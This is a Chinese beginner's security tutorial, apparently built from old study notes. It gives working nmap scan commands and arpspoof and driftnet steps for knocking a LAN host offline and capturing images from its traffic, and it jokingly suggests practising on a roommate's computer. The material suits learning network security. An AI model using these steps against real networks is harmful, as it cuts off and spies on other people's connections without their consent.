文中可能存在错误操作或错误理解,望大家不吝指正.

同时也希望可以帮助到想要学习接触此方面、或兴趣使然的你,让你有个大概的印象.

!阅前须知!

本文是基于我几年前的一本笔记本,上面记录了我学习网络基础时的部分笔记.

本文中的工具可能已经过时,或使用方法已经改变了,感兴趣可以深入查阅资料

(但是我还是列出以前的使用方法供大家借鉴).

ps.若对无线攻击手段WiFi破解感兴趣可以参考以下两篇文章

【无线安全实践入门】基础攻击手段与常用工具简介

【无线安全实践入门】破解WiFi密码的多个方法

ps.本文环境在Kali下,学习最好具备一点linux基础知识.

1.网络扫描和嗅探

NMap(Network Mapper),一个很不错的网络扫描和嗅探工具包

--NMap真的很常用,简直神器

--列出几种简单的使用方法:

--ping扫描,快速,不过回显的内容有限

> nmap -sP (网关IP)/(子网掩码)

--SYN/半开放扫描,加上-A回显详细信息

> nmap -sS [-A] (网关IP)/(子网掩码)

--单个扫描,显示详细内容

> nmap -A (目标IP)

--示例

> nmap -sP 192.168.1.1/24

2.ARP欺骗

局域网中的ARP欺骗还是比较有意思的.像arpspoofEttercap等工具都很不错.

arp欺骗之后其实可以很多动作的...

这里就介绍老掉牙的arpspoof的断网攻击和图片捕获.

ps.有条件的话,可以拿手机或者室友电脑练手(doge脸).

--首先,在局域网环境中配合NMap工具使用,取得目标IP

> nmap -sP (网关IP)/(子网掩码)

2.1.断网攻击

ps.修改ip_forward的值,是为了开启IP转发,其值为'0'时候则禁止转发,目标主机断网.

--修改ip_forward(默认为'0')

--可以提前cat查看一下,若是回显'0',则可以跳过本步

> echo 0 > /proc/sys/net/ipv4/ip_forward 

--开始arp欺骗

> arpspoof -i (你的网卡名称) -t (目标IP) (网关IP)

--使用目标主机上网测试,观察命令行回显.

2.2.图片捕获

--修改ip_forward(默认为'0')

--可以提前cat查看一下,若是回显'1',则可以跳过本步

> echo 1 > /proc/sys/net/ipv4/ip_forward 

--开始arp欺骗(本机网卡名,可以用ifconfig来查看)

> arpspoof -i (本机网卡名) -t (目标IP) (网关IP)

--另外再开一终端,开始抓取图片

> drifnet -i (本机网卡名)

--使用目标主机上网看图片,观察弹出的窗口回显图片,观察命令行回显.

常见的网络协议是网络安全中的基础,能让你能够更快吸收了解技术细节.

加油,共勉

【无线安全实践入门】网络扫描和ARP欺骗的更多相关文章

  1. 【无线安全实践入门】破解WiFi密码的多个方法

    本文希望可以帮助到想要学习接触此方面.或兴趣使然的你,让你有个大概的印象. 文中可能存在错误操作或错误理解,望大家不吝指正. !阅前须知! 本文是基于我几年前的一本笔记本,上面记录了我学习网络基础时的 ...

  2. python scapy的用法之ARP主机扫描和ARP欺骗

    python scapy的用法之ARP主机扫描和ARP欺骗 目录: 1.scapy介绍 2.安装scapy 3.scapy常用 4.ARP主机扫描 5.ARP欺骗 一.scapy介绍 scapy是一个 ...

  3. 第三节课:简单的网络命令和ARP欺骗

    MTU :最大传输单元 RX:收包 TX:   发包 Ifconfig: IP配置命令,config是linux中用于显示或配置网络设备(网络接口卡)的命令 ifconfig eth0 192.168 ...

  4. 【网络编程3】网络编程基础-arp请求(局域网主机扫描)

    ARP协议 ARP(Add ress Resolution Protocol)地址解析协议位于数据链路层,是根据IP地址获取MAC地址的一个协议. ARP 查看指令 arp -a 显示所有接口的当前A ...

  5. 基于ARP的网络扫描工具netdiscover

    基于ARP的网络扫描工具netdiscover   ARP是将IP地址转化物理地址的网络协议.通过该协议,可以判断某个IP地址是否被使用,从而发现网络中存活的主机.Kali Linux提供的netdi ...

  6. 常用网络工具 ipconfig arp traceroute

    如今的计算机是离不开网络的计算机了,因而我们对网络要有一基础的认识.连不上网,程序运行不正常之类的,多少都与网络有关.本文将介绍常用的工具. 网络出问题 ipconfig ping 网络连不上,首先要 ...

  7. 网络扫描工具nmap

    nmap一般就用来扫描主机是否在线(特别是扫描局域网内存活的机器).开放了哪些端口.其他的功能用的比较少,做渗透的人可能要了解的多些. 1.1 选项说明 nmap需要自行安装. shell> y ...

  8. OpenStack实践系列⑤网络服务Neutron

    OpenStack实践系列⑤网络服务Neutron 3.8 Neturn 服务部署 注册neutron服务 [root@node1 ~]# source admin-openrc.sh [root@n ...

  9. 网络扫描信息收集基于(Windows)

    1.首先说明一下一款网络扫描工具,在之前的博客中我曾简要的写过关于Advance IP Scanner使用方法,最近要写网络扫描的工具,所以对这款工具做一个详细的功能细节上的介绍. 如下图  在输入框 ...

随机推荐

  1. windows server疑难杂症

    1.某些网址.服务访问失败,可能的原因:增强的安全配置关闭增强的安全配置,并且重启电脑!!!http://jingyan.baidu.com/article/6181c3e076ac0b152ff15 ...

  2. JavaScript 中的12种循环遍历方法

    原文:JavaScript 中的12种循环遍历方法 题目:请介绍 JavaScript 中有哪些循环和遍历的方法,说说它们的应用场景和优缺点? 1.for 循环 let arr = [1,2,3];f ...

  3. delphi 获取大于2G的物理内存大小

    一般情况下,我们是用GlobalMemoryStatus 来获取物理内存大小的 但该API在物理内存大小超过2G的时候,返回值均为2GB.因此,没有办法获取真实的物理内存大小,所以需要对此进行改进. ...

  4. qmake 时复制文件(自动在编译前做一些操作,且写在.pro文件里)

    有时在编译前需要准备一些文件,例如修改了 QtCreator 的编译输出目录: Build & Run > Default build directory,使用 Promote 后需要在 ...

  5. murmurhash2算法 和 DJB Hash算法是目前最流行的hash算法

    murmurhash2算法 和 DJB Hash算法是目前最流行的hash算法 1.DJB HASH算法 1 2 3 4 5 6 7 8 9 10 11 /* the famous DJB Hash ...

  6. WinForm DataGridView制作表格

    1.  将背景颜色改为白色 this.dataGridView1.BackgroundColor = Color.White; 或 2. 禁止启用添加,启用编辑,启用删除 this.dataGridV ...

  7. 利用BLCR加速android的启动(android4.2)

    BOSS要求提高安卓系统的启动速度,优化bootloader和kernel后,发现还是达不到要求,没办法才打起zygote的注意. ================================== ...

  8. 使用.NET进行高效率互联网敏捷开发的思考和探索【一、概述】

    不知从什么时候开始,创业变得很廉价,谈什么都是互联网,动辄融资千万.这阵风好像也刮向了程序员中,有那么一大批开发者,数据结构不好好学习.数据库原理不扎实掌握,在github上发布几个项目,用nodej ...

  9. 麻省理工的 Picture 语言:代码瘦身的秘诀

    直击现场 如今,机器学习算法已经进入了主流的计算机,而麻省理工学院正在研究一款让每日的编程变得更加简单的技术. MIT 研究者将在六月发布一款新的叫做 Picture 的编程语言,当计算机在视频或者图 ...

  10. Linux 下配置 phpredis 的过程和遇到的问题

    其实对于 Linux 系统和 LNMP 环境并不是很熟,如果有错误请指正. 一.关于 PHP PHP 的编译参考了此文:http://blog.aboutc.net/linux/65/compile- ...